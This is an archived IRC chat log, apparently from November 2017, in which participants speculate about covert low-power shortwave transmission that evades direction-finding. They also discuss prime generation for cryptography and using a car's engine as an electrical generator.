1733488;1510080333;asciilifeform;the difference is that the transmitters there physically move; but is immaterial for our purpose 1733489;1510080407;asciilifeform;apeloyee: positional mod is superset of that item 1733490;1510080441;apeloyee;no reason to only encode the signal in difference then. 1733491;1510080488;asciilifeform;reason is so that each station can be physically indistinguishable, from outside the door, from, e.g., a defective lift motor that arcs a bit 1733492;1510080492;asciilifeform;or similar object. 1733493;1510080543;asciilifeform;theoretically a positional modulator with a long enough span, could cover entire planet, with a few watt. 1733494;1510080576;asciilifeform;( and that few watt, spread over entire 30MHz of shortwave ) 1733495;1510080607;apeloyee;Do you have any data as to how distinguishable defective motors are? e.g. it's probably an impulse filtered with a min-phase filter. whereas fake motor probably won't be. 1733496;1510080625;apeloyee;the transmitter disguised as motor 1733497;1510080648;asciilifeform;what's to stop it from being exactly same spectrally as motor, if that's what i want ? 1733498;1510080688;apeloyee;and phase? 1733499;1510080702;asciilifeform;and phase 1733500;1510080732;asciilifeform;so long as i can force the 2 ends of the line, to differ in such a way as to carry information 1733501;1510080744;apeloyee;again, I have no data, but I suspect you won't be able to encode much data into it 1733502;1510080753;asciilifeform;if any -- then objective met 1733503;1510080758;asciilifeform;even if it's a bit per hour 1733504;1510080793;asciilifeform;submariners reportedly live with a bit or so per sec. 1733505;1510080808;apeloyee;simpler to just transmit 1W over 30MHz. Or 100mW. etc. 1733506;1510080817;asciilifeform;then they find you. 1733507;1510080824;apeloyee;and have your transmitter move, lest it be detected by correlation attacks. 1733508;1510080830;asciilifeform;then i'ma transmit 100kW, why not 1733509;1510080834;asciilifeform;but different problem ! 1733510;1510080881;apeloyee;shannon-hartley theorem. max bit per watt is when you sit far below noise floor 1733511;1510080943;apeloyee;100kW transmit only logarithmically more, but detection easiness in proportional to power 1733512;1510080952;apeloyee;*is proportional 1733513;1510081019;asciilifeform;i dun get how the 2 items can be separate 1733514;1510081031;asciilifeform;if easier to detect for enemy, easier to detect for intended recipient. and vice-versa. neh ? 1733515;1510081091;apeloyee;yep! 1733516;1510081123;asciilifeform;re 30MHz, i could even be entirely wrong, and unusable , because e.g. <7 has vastly different propagation characteristics, day/night/winter/etc vs 7..15Mhz, and in turn from 15..30 1733517;1510081183;apeloyee;don't pop up above noise floor, because bit-per-chance-of-detection drops off rapidly 1733518;1510081192;apeloyee;hence no 100kW 1733519;1510081215;apeloyee;and where you get 100kW on a moving object 1733520;1510081218;apeloyee;anyway 1733521;1510081220;asciilifeform;from diesel, lol 1733522;1510081234;asciilifeform;( iirc mircea_popescu has a 800kW diesel ) 1733523;1510081259;asciilifeform;but my whole q was whether it is possible to do better than the 100yr state-of-the-art of 'keep moving yet transmitter and be prepared to lose it' thing 1733524;1510081310;apeloyee;no magical invisibility potions. 1733525;1510081321;apeloyee;can just decrease the chance of detection. 1733526;1510081336;asciilifeform;nope, but purely physical invisibilities are a-ok. as radio per se is invisible to savages who never heard of radio. 1733527;1510081344;apeloyee;to a reasonable value, but there's probably no escape from "keep moving" 1733528;1510081362;asciilifeform;naturally enemy who gets a hold of your receiver, or whatever secret param, can detect. 1733529;1510081372;asciilifeform;q is whether is is possible to turn this param into the equiv of rsa key. 1733530;1510081376;asciilifeform;without which -- no detection. 1733531;1510081397;apeloyee;e.g.balloon tx'ing can masquerade as thunder 1733532;1510081400;asciilifeform;not even from standing across the street. 1733533;1510081402;apeloyee;becasue moves 1733534;1510081427;asciilifeform;hypothetically. problem is to make a balloon stay up for any reasonable length of time, and not loudly show up on radars wherever it goes 1733535;1510081442;apeloyee;if stands across the street, will detect. forget about it. 1733536;1510081451;asciilifeform;mega-argument 1733537;1510081474;apeloyee;srsly you're asking for invis potion. 1733538;1510081482;asciilifeform;go and detect the static spark i just generated. from across the room, much less street. 1733539;1510081519;apeloyee;you have managed thus to transmit how much? 1733540;1510081525;apeloyee;in bits 1733541;1510081536;asciilifeform;1. if you knew exactly when and where to look. 1733542;1510081550;asciilifeform;single-photon per bit has been demoed, in ideal conditions. 1733543;1510081635;asciilifeform;at any rate, i'm not convinced that the problem is solvable, apeloyee may well be right. but i also remain unconvinced that it is unsolvable. 1733544;1510081646;apeloyee;an' if you keep sparking next to detector across the street, you will Have Problems. because have to transmit enough to rsa. 1733545;1510081676;asciilifeform;that there's the whole noise floor thing, neh. 1733546;1510081734;apeloyee;you stipulated detector's across the street. can do direction finding. 1733547;1510081790;asciilifeform;also i suspect that 'avoid gestapo' is a very small superset of the much harder 'physically undetectable'. for example, if you pirate on an already unusably-polluted band, you would probably never Have Problems for so long as you are not distinguishable from the usual polluters ( e.g. led light bulbs and other filth ) 1733548;1510081796;asciilifeform;*subset 1733549;1510081864;asciilifeform;a block of flats, full of led bulbs, quite possible is the electrical equiv of a 10watt sw station 1733550;1510081893;apeloyee;but also hard to hear you over all that noise. hence my "there's a fixed number of bits you can transmit before detection, assuming given ratio of intended recipient capabilities to enemy capabilities" 1733551;1510081946;apeloyee;and assuming you stay put of course 1733552;1510081951;apeloyee;so don't 1733553;1510081973;apeloyee;move. preferably unpredictably. 1733554;1510081979;apeloyee;(to the enemy) 1733555;1510082031;asciilifeform;ideally said movement would consist of large number of geographically-dispersed stations, taking turns in a sequence not known to the enemy. 1733556;1510082065;asciilifeform;this is where i started in the gedankenexperiment. from there went 'why not to have the sequence per se be the information carrier'. 1733557;1510082092;apeloyee;if they're sleeper stations. 1733558;1510082106;asciilifeform;well yes, in the sense that they spend the vast majority of time, silent 1733559;1510082129;asciilifeform;(receiving. and without leaking oscillator or whatever 20th century idiocy) 1733560;1510082134;apeloyee;why not all of 'em, at 1/N power 1733561;1510082156;asciilifeform;because then you're back to the 'if they're standing next to you, you're found' item. 1733562;1510082279;apeloyee;the enemy doesn't realistically have resource to stand next to everyone. see bitcoin: can't make rewriting history impossible, lets make it unprofitable. 1733563;1510082321;asciilifeform;everyone - no. the few thou known-вредители -- totally 1733564;1510082322;apeloyee;and to detect you, has to stand next ot you during transmission of significant number of bits 1733565;1510082376;apeloyee;be a true вредитель and sabotage the spy device's uplink. they need a phat one. 1733566;1510082390;asciilifeform;not clear that it does 1733567;1510082395;asciilifeform;most of the processing is local 1733568;1510082543;apeloyee;if the enemy is besieging you and watching you all the time, not much you can do 1733569;1510082581;apeloyee;if you can't even plant a relay somewhere nearby 1733570;1510082583;asciilifeform;if the enemy, on account of some internal psychosis, refrains from simply breaking in and shooting, there is plenty to do 1733571;1510082626;asciilifeform;a serious sw relay is not physically small, cannot hide in a tree or similar. 1733572;1510082673;apeloyee;serious is...? 1733573;1510082684;asciilifeform;can be heard across atlantic. 1733574;1510082695;asciilifeform;anything short of that, is a waste of time. 1733575;1510082733;asciilifeform;i.e. 3-4 ionospheric reflections. 1733576;1510082786;apeloyee;sieges are generally followed by an assault, unless th3e besieged surrender; to hope otherwise is simply suicide 1733577;1510082850;asciilifeform;asciilifeform has nfi why he's been standing in line for years, to be gassed. evidently it is a scarce and rationed thing, like everything else in usa. 1733578;1510082885;asciilifeform;and those who want to be gassed faster, gotta work harder, earn it.. 1733579;1510083083;asciilifeform;upstack : a 1w transmitter , under right conditions, can be heard across atlantic. tricky bit is how to extend this to belownoisefloor; and how to make in 'wrong' conditions. 1733580;1510083178;apeloyee;most of the processing is local << if a known вредитель, that means siege. otherwise they need to exchange ~approx as much data as can be fit in spectrum. obv can't reuse the very same spectrum. hence lasers/sound/cables. can be sabotaged. them low noise receiver must cost quite some $$$. 1733581;1510083309;asciilifeform;if apeloyee or whoever wants to get past the tank column, mine field, etc. and demolish the receiver -- i'll clap, what. 1733582;1510083318;asciilifeform;but it is quite different problem from the original thread's. 1733583;1510083359;asciilifeform;otoh if it is in the house next to mine, i have no way of knowing it 1733584;1510083370;asciilifeform;what, gotta break into every single neighbour and see if they have one, lol 1733585;1510083396;apeloyee;understand, they can't keep sieges on 10,000 вредителей. will go bankrupt. 1733586;1510083403;asciilifeform;they're already bankrupt. 1733587;1510083418;asciilifeform;yet folx keep showing up to work. 1733588;1510083435;asciilifeform;because per orlov 'collapse never happens for everyone, it only happens for a particular you, one at a time' 1733589;1510083548;asciilifeform;existing gestapo aside, consider also future enemy. because even when the empires of today are forgotten, hogging sw spectrum will be a simple way to make new enemy. 1733590;1510083578;asciilifeform;it's a limited resource and whatever crowned idiots sit on whatever thrones, will claim it 1733591;1510083909;asciilifeform;incidentally the problem as originally stated, 'communicate across planet with a few watt, reliably, unjammably, and as close to undetectably as possible' was obsession of usg in 1940s-50s; and was declared 'solved enough' when satellite was built. 1733592;1510083927;asciilifeform;asciilifeform's original q could be restated as 'how to achieve same thing as satellite, but without any' 1733593;1510084021;apeloyee;an' they have 30000 SDRs to keep the siege? physical objects? 1733594;1510084031;asciilifeform;it's what, 10bux. 1733595;1510084051;asciilifeform;plus a good number are in orbit, so narrow down where to look quite effectively. 1733596;1510084061;apeloyee;an' operators. robots not yet functional enough. 1733597;1510084073;apeloyee;gotta emplace 'em 1733598;1510084090;asciilifeform;the 'amateur radio' people stoolie for free. 1733599;1510084114;asciilifeform;http://www.arrl.org/intruder-watch << e.g. 1733600;1510084118;apeloyee;not next door. 1733601;1510084125;asciilifeform;quite likely next door. 1733602;1510084135;apeloyee;and you'll know about 'em. antennas. 1733603;1510084147;asciilifeform;what, i gotta kill every old d00d with a discone on his roof now ? 1733604;1510084150;asciilifeform;what if in his attic ? 1733605;1510084164;asciilifeform;it works just as well in attic. 1733606;1510084168;apeloyee;remember, 1 antenna not enough. 1733607;1510084179;asciilifeform;so one on each house on each side. 1733608;1510084182;asciilifeform;why not. 1733609;1510084207;asciilifeform;quite likely 1 on 3 sides, each a few km from house, suffices. 1733610;1510084229;apeloyee;gotta exchange among them all traffic. 1733611;1510084242;apeloyee;or they must send strgraight to enemy 1733612;1510084247;apeloyee;via a phat pipe. 1733613;1510084257;asciilifeform;i dun see why this is necessary 1733614;1510084279;asciilifeform;what happens is that 5-6 pensioners notice 'noise' and get in their trucks and df for usg for free, for a month, if it takes a month 1733615;1510084314;apeloyee;hogging sw spectrum will be a simple way to make new enemy. << can reach a mutially beneficial agreement. the more transmitters, the more channel capacity, until the distortion is above noise. 1733616;1510084330;asciilifeform;now this theoretically tru 1733617;1510084355;asciilifeform;and i've proposed it here -- relays passing rsa-signed packets on. 1733618;1510084403;apeloyee;df for usg for free << correlation attacks work but are neither easy nor cheap. if they only exchange 10% of the traffic, will take 10x as long to find you, unless they know the key 1733619;1510084456;asciilifeform;was still speaking of the scenario with 1 station 1733620;1510084471;asciilifeform;( currently there are 0. ) 1733621;1510084568;apeloyee;and? understand I claimed that it's possible to find you, not that it's easy or cheap 1733622;1510084592;asciilifeform;personally i'd be satisfied with a 'it costs all the king's horses and all the king's men' item. 1733623;1510084668;apeloyee;yes, involves capturing and comparing traffic from multiple points, because each individual bit gives very little confidence 1733624;1510084684;apeloyee;if you miss some time period, got to capture moar. 1733625;1510084698;asciilifeform;could restate problem as 'maximize # of bits that can be sent before you gotta move' 1733626;1510084715;apeloyee;transmit slowly enough. enemy's cost to proportional to time 1733627;1510084780;asciilifeform;can also restate as 'how slowly' 1733628;1510084839;apeloyee;this, yes. 1733629;1510084851;apeloyee;'maximize # of bits that can be sent before you gotta move' << this mostly involves choice of locality. "check if the map matches the locality. If it doesn't - change the locality."(R)(C) 1733630;1510084866;asciilifeform;lol 1733631;1510084908;asciilifeform;observe, the problem dun exist if you already have your own pyongyang and can happily put a megawatt station there and invite whoever objects, to pound sand up his arse 1733632;1510084921;asciilifeform;q is, wat do for people who dun have a pyongyang. 1733633;1510084977;asciilifeform;e.g. ru horizon radar , eats what, half a MHz of sw, and betcha they have a massive garbage bin to put the complaints from 50 years into. 1733634;1510085031;asciilifeform;orig thread is most properly concerning small radios, deep in enemy territory. 1733635;1510085117;asciilifeform;the empires solved this with satellite. 1733636;1510085138;asciilifeform;( which will last maybe 40 min. when actual war, but nobody seems to give a shit. ) 1733637;1510085208;apeloyee;more crackpot ideas: live in flyshitville, can then have ample warning about enemy detection equipment, and plenty of RF emission by and neighbors' equipment to hide behind ( but few neighbors, important for SNR) 1733638;1510085220;asciilifeform;mircea_popescu iirc actually does this. 1733639;1510085224;asciilifeform;whole mountain. 1733640;1510085240;asciilifeform;with multi-km of jungle around. 1733641;1510085297;asciilifeform;it has up side, and down ( e.g. http://btcbase.org/log/2017-08-30#1706555 ) 1733642;1510085297;a111;Logged on 2017-08-30 20:08 mircea_popescu: and the shower has a pair of buttons : if you increase the hot water debit, this drops pressure for the hot pump, which kicks in, dropping pressure for the main pump, which kicks in. and vice-versa. 1733643;1510085367;asciilifeform;a budget-model pyongyang, could say. 1733644;1510085609;apeloyee;more: set up a site, bemoaning "radio intruders" on $band, stream from several nearby radios on it. the recipient can then improve SNR by subtracting whatever interference (from your POV), or estimate atmospheric conditions 1733645;1510085632;apeloyee;re above, at least have a hidden relay in Flyshit Forest 1733646;1510085643;apeloyee;better several 1733647;1510085643;asciilifeform;with very very long mains cable, lol 1733648;1510085685;apeloyee;if 1W is enough... 1733649;1510085730;asciilifeform;1w on empty band, with just-so sunspot cycle, etc. was on at least 1 occasion picked up across atlantic. 1733650;1510085736;asciilifeform;this is separate item from 'can do on demand' tho. 1733651;1510085820;apeloyee;see above re execrable efficiency of classic modes. 1733652;1510085830;asciilifeform;year-round, day/night on crowded band prolly wants multi-kw. 1733653;1510085836;asciilifeform;but yes. 1733654;1510085906;asciilifeform;also must note that if the relay is controlled via radio, you've re-created orig problem in miniature. 1733655;1510086013;apeloyee;if you needed 1W before, add a relay half-way, need 0.25W for you and relay nao. generally private relay should be a lot closer to sender. needless to say relay must re-modulate. 1733656;1510086067;apeloyee;and preferably store-and-forward at opportune atmospheric conditions. 1733657;1510086086;asciilifeform;sorta how i got to the positional modulator thing -- can you take advantage of the fact of having 2+ dispersed stations. 1733658;1510086098;asciilifeform;for the tx process per se. 1733659;1510086147;asciilifeform;as for atmospheric conditions, station has no way of knowing them 1733660;1510086161;asciilifeform;it can only send (or not), is all it can do 1733661;1510086182;asciilifeform;( the british-style 'can i hear bbc?' nonsense, i will dismiss out of hand, no externals plox ) 1733662;1510086240;apeloyee;can add a phase offset so that they are in-phase at receiver. N stations, more than N times SNR increase, but opens to attacks based on partial knowledge 1733663;1510086255;apeloyee; no externals plox << opportunistic use is a thing 1733664;1510086261;asciilifeform;it's a thing until it isn't 1733665;1510086279;asciilifeform;otherwise i'd have started the thread with unsecured satellite relays ( which do currently exist ) 1733666;1510086380;asciilifeform;or, more elementarily, 'wardriving' ( 802.11 crypto was broken to death quite recently, note ) 1733667;1510086412;asciilifeform;but these rely on existing infrastructure, like flea relies on dog. asciilifeform's q was specifically re self-contained structure. 1733668;1510086421;apeloyee;consider that the enemy will certainly take advantage of your willful ignorance of atmospheric conditions (as known from bbc,etc), as you will up the power 1733669;1510086449;asciilifeform;just as he will take advantage of having airplane, and satellite, and armies, etc. 1733670;1510086464;asciilifeform;q is what is the best that can be done with simply a radio. 1733671;1510086501;asciilifeform;once hypothetical net has multiple stations on various continents, it will have its own idea of atmospheric conditions. but not before. 1733672;1510086521;asciilifeform;before that it only has what crumbs enemy throws from the table. 1733673;1510086565;asciilifeform;( i wouldn't put it past'em to 'technical glitch' and turn off bbc for a few min. to get you to up your wattage, say ) 1733674;1510086609;asciilifeform;see, for instance, the ancient thread where we anathemized ntp. 1733675;1510086778;BingoBoingo;!~ticker --market all 1733676;1510086786;jhvh1;BingoBoingo: Bitstamp BTCUSD last: 7040.87, vol: 13438.87141142 | Bitfinex BTCUSD last: 7027.7, vol: 41358.63189668 | Kraken BTCUSD last: 7049.0, vol: 3292.73922678 | Volume-weighted last average: 7031.95416165 1733677;1510087710;BingoBoingo; ( i wouldn't put it past'em to 'technical glitch' and turn off bbc for a few min. to get you to up your wattage, say ) << They do it to comcast 1733678;1510087719;asciilifeform;moar famously, to nasdaq 1733679;1510087723;BingoBoingo;Also 1733680;1510087751;asciilifeform;http://btcbase.org/log/2017-07-04#1678932 << 1733681;1510087751;a111;Logged on 2017-07-04 03:09 asciilifeform: in other unsurprises, 'Corrupt data that accidentally flowed out of a NASDAQ systems test caused the share prices...' 1733682;1510087755;asciilifeform;and prior. 1733683;1510087770;BingoBoingo;For a while big mediterranean cables were snipped similarly to likely same effect 1733684;1510087777;asciilifeform;it's a regular thing. 1733685;1510087800;asciilifeform;but there are still occasional folx who seem to think 'But They Wouldn't...' 1733686;1510087805;asciilifeform;they would. 1733687;1510087866;asciilifeform;we're speaking of the same empire who did live-fire biowar tests on own population, in the subways, 1950s 1733688;1510087872;asciilifeform;and other joys. 1733689;1510087925;asciilifeform;not only is 'turn off bbc/nasdaq/ntp to Help Nail A Terrorist' an unremarkable proposition in comparison, but prolly has existing, fully-robotic infrastructure ready to roll. 1733690;1510087932;asciilifeform;!#s kill switch 1733691;1510087932;a111;18 results for "kill switch", http://btcbase.org/log-search?q=kill%20switch 1733692;1510087989;asciilifeform;hm, nothing pertinent in there. odd. 1733693;1510088093;asciilifeform;they're happy to fly boeings into sea / towers / etc. remotely. nobody will even fart at ntp/bbc/etc. 1733694;1510088366;asciilifeform;meanwhile, in the pleasures of overflowsandpointerslang , https://github.com/google/syzkaller/blob/master/docs/linux/found_bugs_usb.md 1733695;1510088923;asciilifeform;https://archive.is/zt3pD << commentary. 1733696;1510089361;BingoBoingo;Oh my 1733697;1510090655;shinohai;https://www.antena3.ro/actualitate/social/o-organizatie-anarhista-prezenta-la-protestele-de-duminica-441087.html <<< Is my Romanian really that terrible, or are they calling a meme an "anarchist organization" ? 1733698;1510090797;asciilifeform;i dun reddit, so cannot say, meme or organization etc 1733699;1510090900;shinohai;Nah, kekistan is a 4chan meme: http://knowyourmeme.com/memes/kekistan 1733700;1510091353;asciilifeform;'That day, Polygon[13] and Kotaku[12] published articles calling the Kekistan flag an “alt-right” and “white nationalist” symbol' << lol 1733701;1510092509;asciilifeform;meanwhile in world of orlols, http://cluborlov.blogspot.com/2017/11/the-october-revolution-and-you.html 1733702;1510094831;mircea_popescu;http://btcbase.org/log/2017-11-07#1733356 << for completeness i originally read "largest prime factor", and intuitively thought i see the proof, but meanwhile that also collapsed. 1733703;1510094831;a111;Logged on 2017-11-07 16:21 apeloyee: I must say that I dont understand how "exponent 131074 reduces to exponent 2 somehow", and what CRT has to do with it 1733704;1510094945;mircea_popescu;http://btcbase.org/log/2017-11-07#1733394 << finite formula. 1733705;1510094945;a111;Logged on 2017-11-07 16:41 asciilifeform: but as i currently understand, my q reduces to 'find The Formula For Primes' (tm)(r), a millenium-long headache for mathematical folx , to this day unsolved. 1733706;1510095010;asciilifeform;i.e. generator of nth prime in O(1) time. nobody's got one and i don't expect anyone will. 1733707;1510095078;mircea_popescu;http://btcbase.org/log/2017-11-07#1733418 << no, actually : should generate new prime by adding a byte to the extant number that failed on a PROBABILITY based index. ie, adding to offset 0 much less probable than adding to offset 4090 1733708;1510095078;a111;Logged on 2017-11-07 17:03 asciilifeform: what ought to do instead, is to rngize the bottom Q bits, where Q is log2(estimated prime gap at the current bitness, times severalfold engineering margin) 1733709;1510095116;mircea_popescu;in general so after 16773120 bits were produced by FG, 4096 were added to last bit and 1 to first. pyramidfixer. 1733710;1510095120;asciilifeform;afaik all of the bits are equally likely to 'need flipping' 1733711;1510095125;asciilifeform;but i have no proof of this yet. 1733712;1510095138;mircea_popescu;asciilifeform not so, because the gap's a cone not a rectangle 1733713;1510095187;asciilifeform;i'ma have to chew on this. 1733714;1510095187;mircea_popescu;http://btcbase.org/log/2017-11-07#1733423 << because you keep clicking on them. 1733715;1510095187;a111;Logged on 2017-11-07 17:14 asciilifeform: ( why is there EVER EVEN ONE ?! ) 1733716;1510095201;asciilifeform;i load 1-2 / week, lol 1733717;1510095358;mircea_popescu;http://btcbase.org/log/2017-11-07#1733431 <<< bwahaha 1733718;1510095358;a111;Logged on 2017-11-07 17:27 apeloyee: ......p_n are independent and uniformly distributed, then the probability of tuple of these being chosen is the same (by definition of independence), and because CRT gives a bijection, all outputs are equally likely. did I repeat myself enough? 1733719;1510095439;mircea_popescu;http://btcbase.org/log/2017-11-07#1733438 << let them learn how to fucking use technological civilisation, get a deedbot account and fucking charge like sane people. 1733720;1510095439;a111;Logged on 2017-11-07 17:29 apeloyee: you want sci-hub to wwork for phree? 1733721;1510095452;mircea_popescu;or whatever, if they don't feel like it, like eg ben_vulpes doesn't for his paste service, let them not to 1733722;1510095502;mircea_popescu;but otherwhise there's no excuse available to the chuchka that "washing is too hard and besides rubbing against a tree trunk is a close approximation" 1733723;1510095560;asciilifeform;the scihub thing isn't even sure what it wants to be , 13337 w4r3z, or 'service' 1733724;1510095591;asciilifeform;this is the fate of all 'we don't have an ideology' derps 1733725;1510095600;asciilifeform;bobbing about like shit in icehole. 1733726;1510095607;mircea_popescu;it wants to be whatever usg's silicon valley politruks appear to be willing to put stalin's notes behind that season. 1733727;1510095613;mircea_popescu;"pivot" being the anglo word for this. 1733728;1510095661;mircea_popescu;http://btcbase.org/log/2017-11-07#1733464 << i still don't follow how you figure the approach elides some primes. 1733729;1510095661;a111;Logged on 2017-11-07 17:39 asciilifeform: i have nothing against ~simple and OBVIOUSLY correct~ optimizations, apeloyee 1733730;1510095688;asciilifeform;it is more that i cannot prove to my satisfaction that it does not skew the distribution . 1733731;1510095706;asciilifeform;nor give some segments of the input bitstring more influence over the output than others. 1733732;1510095731;asciilifeform;nor emit information re the input or output via timing sidechannel. 1733733;1510095745;mircea_popescu;i suppose at this juncture a moderately interesting item would be to run some for loops and see. 1733734;1510095753;asciilifeform;see what ? 1733735;1510095755;mircea_popescu;numeric methods to the rescue. wtf are computers even for amirite. 1733736;1510095761;mircea_popescu;asciilifeform how the histogram of the result looks. 1733737;1510095768;asciilifeform;effect too small to ever observe experimentally, can still kill you if enemy finds it. 1733738;1510095775;asciilifeform;which is why cryptography is NOT an experimental science. 1733739;1510095781;mircea_popescu;but effect large enough to observe experimentally was observed experimentally. 1733740;1510095792;asciilifeform;has no bearing on the ones that are not. 1733741;1510095792;mircea_popescu;hence "moderately interesting". 1733742;1510095805;mircea_popescu;asciilifeform you're not proving it safe, you're examining if you can prove it unsafe. 1733743;1510095808;asciilifeform;possibly interesting, could reveal that 'obvious problem is obvious' but not beyond. 1733744;1510095810;asciilifeform;aha. 1733745;1510095820;mircea_popescu;more than nothing. for all the idle cycles being burned erryday... 1733746;1510095824;asciilifeform;'testing reveals only presence of bugs, never absence' etc. 1733747;1510095870;mircea_popescu;tbh, by comparison with the volume of spurious strings pasted into shitsites, the amount of idle for loops executed to date seems dismall. less reddit more foring. 1733748;1510095886;asciilifeform;lol but the empty loops in microshit!1111 1733749;1510095896;asciilifeform;y'know, the ones they occasionally remove, to make fast!11 1733750;1510096022;mircea_popescu;http://btcbase.org/log/2017-11-07#1733491 << for the record, these were a lot more common in soviet union than in present days. 1733751;1510096022;a111;Logged on 2017-11-07 18:48 asciilifeform: reason is so that each station can be physically indistinguishable, from outside the door, from, e.g., a defective lift motor that arcs a bit 1733752;1510096042;asciilifeform;mircea_popescu: they've been displaced by 'modern' crapola, e.g. led light bulbs, 'power line ethernet', etc 1733753;1510096042;mircea_popescu;what IS however overwhelmingly present in su of today is the howl of the newstyle ligthtbulb balancing circuits. 1733754;1510096046;mircea_popescu;right. 1733755;1510096050;mircea_popescu;the lights especially. 1733756;1510096057;asciilifeform;they nuke sw reception ~entirely 1733757;1510096065;asciilifeform;for km+. 1733758;1510096092;asciilifeform;( at least in the classical 'i want my orders from moscow' type of sw ) 1733759;1510096214;mircea_popescu;http://btcbase.org/log/2017-11-07#1733519 << my car actually has 160kW powerplant installed. 1733760;1510096214;a111;Logged on 2017-11-07 19:00 apeloyee: and where you get 100kW on a moving object 1733761;1510096222;asciilifeform;lol even mine 1733762;1510096225;mircea_popescu;ikr 1733763;1510096235;asciilifeform;( tricky to get that 160 out as dc current tho ) 1733764;1510096246;mircea_popescu;btw, why the fuck don't there exist wheel-dynamos ? 1733765;1510096250;asciilifeform;my alternator's good for 3-4kW 1733766;1510096264;mircea_popescu;i want an unit which lifts up the bridge, plugs into the car as if it were a wheel, and then simply converts. 1733767;1510096268;asciilifeform;mircea_popescu: they do, asciilifeform's father designed one when he was my current age 1733768;1510096271;asciilifeform;test stand machine 1733769;1510096276;asciilifeform;sorta like gigantic treadmill. 1733770;1510096279;mircea_popescu;yes but i mean, on sale as a product. 1733771;1510096288;asciilifeform;it is probably buyable actually 1733772;1510096290;mircea_popescu;park your car, put out 50kW or w/e the conversion yielkds. 1733773;1510096294;mircea_popescu;i never saw one 1733774;1510096295;asciilifeform;or rather, a modern non-orc incarnation 1733775;1510096308;asciilifeform;inquire at 'pollution test' equip vendors 1733776;1510096320;mircea_popescu;that thing is like 1.5mn and the size of a room 1733777;1510096328;asciilifeform;that's how big it'd be 1733778;1510096328;mircea_popescu;i don't want that crap. i want a unit the size of washing machine. 1733779;1510096334;mircea_popescu;compact, and ready to go in back of truck 1733780;1510096342;asciilifeform;the gearbox is massive loss 1733781;1510096349;mircea_popescu;not that massive. 1733782;1510096366;mircea_popescu;at least on good quality german makes, it's not. i dunno about toyota nissan 1733783;1510096381;asciilifeform;quite massive from pov of 'i want to make my auto into dynamo' 1733784;1510096417;mircea_popescu;that's not what i want. i want a washingmachine dynamo i can put in the back of the truck and take to middle of nowhere for tailgate party with megawatt power available. 1733785;1510096445;asciilifeform;prolly easier to perma-mod the truck. see what the cement mixer people do. 1733786;1510096456;asciilifeform;( takeoff on rear differential, iirc ) 1733787;1510096457;mircea_popescu;how would the perma-modded truck fucking drive to there ? 1733788;1510096460;mircea_popescu;no, no. convertible. 1733789;1510096468;asciilifeform;well yes convertible, there's a clutch 1733790;1510096489;mircea_popescu;i guess. but welding the washing machine into the truck bed seems meh. 1733791;1510096512;asciilifeform;BingoBoingo may have the exact recipe, this is a thing welders, cement people, etc. actually do. 1733792;1510096524;mircea_popescu;ya but partyers are apparently idiots. 1733793;1510096536;asciilifeform;mircea_popescu often throws >3kW party ? 1733794;1510096539;mircea_popescu;carry little piddly engine when has proper engine under hood. 1733795;1510096541;mircea_popescu;asciilifeform yes. 1733796;1510096566;mircea_popescu;for one thing, inductive load is generally 3x the rated draw. 3kw is not a fucking ac unit for instance. 1733797;1510096573;asciilifeform;tru! 1733798;1510096593;mircea_popescu;and most of the weight of the 30kg generator that needs a fuckming crane to move comfortably is the fucking engine, which guess what, i already have. 1733799;1510096627;asciilifeform;the 'hybrid' crackpot autos, incidentally, have proper gen 1733800;1510096628;mircea_popescu;and much better than any fucking converted lawnmower they sell as generator, for that matter. 1733801;1510096638;mircea_popescu;asciilifeform i tried like 5 diff ones, they're all shit. 1733802;1510096651;asciilifeform;oh hm really ? the 'prius' etc 1733803;1510096654;*;asciilifeform not tried 1733804;1510096662;mircea_popescu;basically a slightly overgrown common alternator, like fit for a truck, but put on car and hurr durr we have hybrids 1733805;1510096670;mircea_popescu;no you don't, you have a truck alternator on a shitty nissan. 1733806;1510096694;asciilifeform;the disgraceful thing is that they still have gearboxes 1733807;1510096699;asciilifeform;( vs motor-per-wheel ) 1733808;1510096713;asciilifeform;actual hybrid (e.g. sov mining trucks) had motor-in-wheel. 1733809;1510096718;ben_vulpes;take out that drivetrain and they'll blow over in the wind 1733810;1510096760;asciilifeform;ben_vulpes: this is tru of all plasticars 1733811;1510096763;asciilifeform;incl the porches etc 1733812;1510096815;mircea_popescu;^ 1733813;1510096829;mircea_popescu;ben_vulpes gets it. the have the zamak because cheapest answer to dynamic problems. 1733814;1510096849;mircea_popescu;and motor per wheel works on you know, 50ton tatra mining truck. 1733815;1510096868;ben_vulpes;plus gotta reengineer differentials in software if yr going motor per wheel 1733816;1510096884;ben_vulpes;not intractable, just more complicated than bolting a muxer to the driveshaft. 1733817;1510096895;asciilifeform;ben_vulpes: it is why it wasn't done. they literally cannot afford even one simple piece of correct soft. 1733818;1510096915;*;ben_vulpes still a fan of the wrightspeed/volt model of onboard generation and electric drivetrain 1733819;1510096931;ben_vulpes;asciilifeform: yeah obcs 1733820;1510096934;ben_vulpes;obvs* 1733821;1510096936;asciilifeform;ben_vulpes: aka sov mining truck. and it works. 1733822;1510096943;asciilifeform;and the motors scale down. but needs correct soft. 1733823;1510096968;ben_vulpes;and how; wrightspeed has mega boner-inducing turbine generator 1733824;1510096997;BingoBoingo; the gearbox is massive loss Internal friction in motor pistons ~50% loss, so what? 1733825;1510097002;asciilifeform;mircea_popescu: dynamometer. e.g. http://www.dynojet.com/products/dynamometers/Automotive-dynamometers.aspx 1733826;1510097019;asciilifeform;( not all room-sized and stationary. can get on truck bed. ) 1733827;1510097028;asciilifeform;terrible imho way to generate current. but would work. 1733828;1510097054;BingoBoingo; BingoBoingo may have the exact recipe, this is a thing welders, cement people, etc. actually do. << Called a "power take off" Standard issue on tractors. Special order on trucks. 1733829;1510097182;BingoBoingo; ( vs motor-per-wheel ) << requires more software for traction control when you have all of the torque starting from 0 1733830;1510097192;asciilifeform;lolwat 1733831;1510097201;asciilifeform;you get as much or little torque as you want, motors take pwm 1733832;1510097217;ben_vulpes;more perfectly correct software to write. 1733833;1510097244;mircea_popescu;hanbot http://p.bvulpes.com/pastes/04wcZ/?raw=true 1733834;1510097247;ben_vulpes;noob will hammer throttle, wheels will lose traction ~instantly 1733835;1510097278;asciilifeform;ben_vulpes: it isn't so difficult for ignoramus to wreck an ordinary auto, either 1733836;1510097319;mircea_popescu;asciilifeform that pos goes over the wheel, bs. i want to bolt it on instead of the wheel! 1733837;1510097381;asciilifeform;ideally you'd have the rotor attached to the drive shaft; by default stator is disconnected. when you want to turn the auto into generator, you put the thing in neutral, undo the clutch, and put on gas (ideally has 'cruise control' throttle) 1733838;1510097381;asciilifeform;so no manipulations with wheels. 1733839;1510097430;asciilifeform;this would be a spiffy thing, 